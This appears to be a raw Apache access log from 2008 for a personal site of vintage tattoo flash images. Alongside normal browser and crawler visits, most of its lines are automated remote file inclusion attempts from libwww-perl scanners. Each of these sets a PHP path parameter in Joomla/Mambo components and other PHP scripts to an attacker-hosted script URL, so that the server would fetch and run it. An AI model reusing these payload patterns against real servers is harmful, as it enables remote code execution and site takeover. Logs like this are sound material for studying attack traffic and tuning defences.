74.55.53.226 - - [28/May/2008:12:45:55 -0500] "GET /db.php?path_local=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
84.21.71.133 - - [28/May/2008:12:49:24 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
84.21.71.133 - - [28/May/2008:12:49:24 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.55.208.133 - - [28/May/2008:12:50:55 -0500] "GET /tattoo HTTP/1.1" 301 330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
84.19.176.172 - - [28/May/2008:12:53:40 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=hhttp://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
84.19.176.172 - - [28/May/2008:12:53:41 -0500] "GET //classes/adodbt/sql.php?classes_dir=hhttp://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
65.55.208.133 - - [28/May/2008:12:56:17 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.148.252.24 - - [28/May/2008:12:58:41 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:12:58:42 -0500] "GET /skin/zero_vote/error.php?dir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
75.125.252.82 - - [28/May/2008:12:58:54 -0500] "GET /logs/access_log.1207785600/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 447 "-""libwww-perl/5.810"
209.163.169.99 - - [28/May/2008:13:05:39 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
209.163.169.99 - - [28/May/2008:13:05:39 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
209.163.169.99 - - [28/May/2008:13:05:42 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
209.163.169.99 - - [28/May/2008:13:05:42 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
212.146.133.138 - - [28/May/2008:13:11:06 -0500] "GET /logs/access_log.1207785600/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 408 "-""libwww-perl/5.803"
212.146.133.138 - - [28/May/2008:13:11:06 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 381 "-""libwww-perl/5.803"
212.146.133.138 - - [28/May/2008:13:11:07 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 386 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:13:11:48 -0500] "GET /logs/access_log.1207785600//?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:13:11:49 -0500] "GET //?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:13:11:50 -0500] "GET /logs//?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 85278 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:13:11:51 -0500] "GET /logs/access_log.1207008000//?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
65.55.208.136 - - [28/May/2008:13:13:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [28/May/2008:13:13:36 -0500] "GET /logs/access_log.1206144000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.2.100.138 - - [28/May/2008:13:13:45 -0500] "GET /logs/access_log.1207180800//tools/send_reminders.php?noSet=0&includedir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:13:13:45 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:13:13:46 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
213.198.106.61 - - [28/May/2008:13:15:24 -0500] "GET /logs/access_log.1207180800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
213.198.106.61 - - [28/May/2008:13:15:24 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
213.198.106.61 - - [28/May/2008:13:15:25 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
74.208.69.184 - - [28/May/2008:13:16:20 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.208.69.184 - - [28/May/2008:13:16:21 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
69.94.56.38 - - [28/May/2008:13:32:24 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 344 "-""libwww-perl/5.48"
69.94.56.38 - - [28/May/2008:13:32:24 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gxczhb.gov.cn/id.txt? HTTP/1.0" 404 339 "-""libwww-perl/5.48"
77.99.3.127 - - [28/May/2008:13:32:29 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:29 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:29 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:33 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:33 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:33 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:33 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:33 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:33 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:34 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:34 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:34 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:34 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
77.99.3.127 - - [28/May/2008:13:32:34 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
64.180.134.223 - - [28/May/2008:13:33:20 -0500] "GET /logs/admin.php?include_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
64.180.134.223 - - [28/May/2008:13:33:21 -0500] "GET /admin.php?include_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
217.114.163.198 - - [28/May/2008:13:35:46 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
217.114.163.198 - - [28/May/2008:13:35:46 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
64.38.8.186 - - [28/May/2008:13:37:49 -0500] "GET /logs/access_log.1207785600/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:13:37:49 -0500] "GET /admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:13:37:49 -0500] "GET /logs/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
69.94.28.54 - - [28/May/2008:13:38:26 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""-"
80.93.62.97 - - [28/May/2008:13:40:10 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
80.93.62.97 - - [28/May/2008:13:40:10 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
89.108.67.59 - - [28/May/2008:13:40:15 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
89.108.67.59 - - [28/May/2008:13:40:15 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
64.38.8.186 - - [28/May/2008:13:41:03 -0500] "GET /logs/access_log.1207180800/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:13:45:00 -0500] "GET /logs/access_log.1207785600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 371 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:13:45:00 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
64.38.8.186 - - [28/May/2008:13:45:00 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
64.180.134.223 - - [28/May/2008:13:45:17 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
64.180.134.223 - - [28/May/2008:13:45:19 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
124.115.4.213 - - [28/May/2008:13:46:53 -0500] "GET / HTTP/1.1" 200 1243 "http://tomdolan.pconline.com/""Sosospider+(+http://help.soso.com/webspider.htm)"
62.2.100.138 - - [28/May/2008:13:49:05 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:13:49:07 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
75.126.69.130 - - [28/May/2008:13:49:49 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
75.126.69.130 - - [28/May/2008:13:49:49 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
84.19.176.172 - - [28/May/2008:13:54:50 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
84.19.176.172 - - [28/May/2008:13:54:50 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
74.6.17.187 - - [28/May/2008:13:57:30 -0500] "GET /?D=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.255.60.210 - - [28/May/2008:14:07:33 -0500] "GET /logs/access_log.1207180800//tools/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
89.255.60.210 - - [28/May/2008:14:07:33 -0500] "GET /logs/access_log.1207180800//tools/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
89.255.60.210 - - [28/May/2008:14:07:33 -0500] "GET //tools/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
89.255.60.210 - - [28/May/2008:14:07:33 -0500] "GET //tools/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
89.255.60.210 - - [28/May/2008:14:07:33 -0500] "GET /logs//tools/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
89.255.60.210 - - [28/May/2008:14:07:33 -0500] "GET /logs//tools/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
65.55.208.124 - - [28/May/2008:14:08:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [28/May/2008:14:08:40 -0500] "GET /logs/access_log.1198454400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.148.252.24 - - [28/May/2008:14:08:51 -0500] "GET /logs//performs.php/components/com_artlinks/artlinks.dispnew.php=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 388 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:14:08:52 -0500] "GET //performs.php/components/com_artlinks/artlinks.dispnew.php=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 383 "-""libwww-perl/5.79"
74.50.15.70 - - [28/May/2008:14:13:30 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
74.50.15.70 - - [28/May/2008:14:13:30 -0500] "GET /modules/xfsection/modify.php?dir_module=http://www.rehau-trocal.ru/cgi/idscan6?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
213.148.252.24 - - [28/May/2008:14:15:17 -0500] "GET /logs//performs.php/components/com_artlinks/artlinks.dispnew.php=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 385 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:14:15:17 -0500] "GET //performs.php/components/com_artlinks/artlinks.dispnew.php=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 380 "-""libwww-perl/5.79"
207.7.108.240 - - [28/May/2008:14:17:45 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
207.7.108.240 - - [28/May/2008:14:17:45 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
67.19.184.18 - - [28/May/2008:14:18:30 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
67.19.184.18 - - [28/May/2008:14:18:31 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.wendyandkimberly.com/img/ID.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
98.198.153.235 - - [28/May/2008:14:18:58 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GFRD_enUS207US208&q=vintage+flash+tattoos""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:18:58 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:18:58 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:18:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:03 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:16 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:37 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:37 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:37 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
98.198.153.235 - - [28/May/2008:14:19:37 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
213.148.252.24 - - [28/May/2008:14:20:31 -0500] "GET /logs//phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 387 "-""libwww-perl/5.79"
213.148.252.24 - - [28/May/2008:14:20:32 -0500] "GET //phpffl/phpffl_webfiles/program_files/livedraft/admin.php=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 382 "-""libwww-perl/5.79"
